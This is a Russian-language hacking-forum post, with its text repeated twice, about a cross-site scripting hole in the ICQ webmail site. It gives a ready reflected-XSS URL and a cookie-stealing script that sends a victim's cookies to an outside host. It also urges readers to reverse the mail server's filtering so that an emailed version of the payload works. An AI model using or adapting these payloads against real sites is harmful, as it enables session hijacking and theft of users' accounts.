PSalm69
23.09.2005, 14:31
Для тех кто не знал:
На сайте www.icq.com нам предоставляют зарегестрировать мыло. Кому это нужно? Нам не нужно.... нужно им =)
http://www.icqmail.com/tnb_single.asp?foldername=options&tabup=?"><script>alert(document.cookie)</script>
Довольно распространнённая XSS.
Но, как ни странно есть НО. Посылается письмо на мыло icq@icqmail.com от наивного чукотского парня с примерно вот таким содержанием
<script>img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>
пройдя через сервер "мыльной аськи" наши старания не увенчаются успехом. Начальный и конечный тег скрипта будет искривлён.
Мы же простые албанские юноши и девушки можем понять структуру замены нашего кода и вывести нормально рабочий скрипт.
Удачи в реале
На сайте www.icq.com нам предоставляют зарегестрировать мыло. Кому это нужно? Нам не нужно.... нужно им =)
http://www.icqmail.com/tnb_single.asp?foldername=options&tabup=?"><script>alert(document.cookie)</script>
Довольно распространнённая XSS.
Но, как ни странно есть НО. Посылается письмо на мыло icq@icqmail.com от наивного чукотского парня с примерно вот таким содержанием
<script>img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>
пройдя через сервер "мыльной аськи" наши старания не увенчаются успехом. Начальный и конечный тег скрипта будет искривлён.
Мы же простые албанские юноши и девушки можем понять структуру замены нашего кода и вывести нормально рабочий скрипт.
Удачи в реале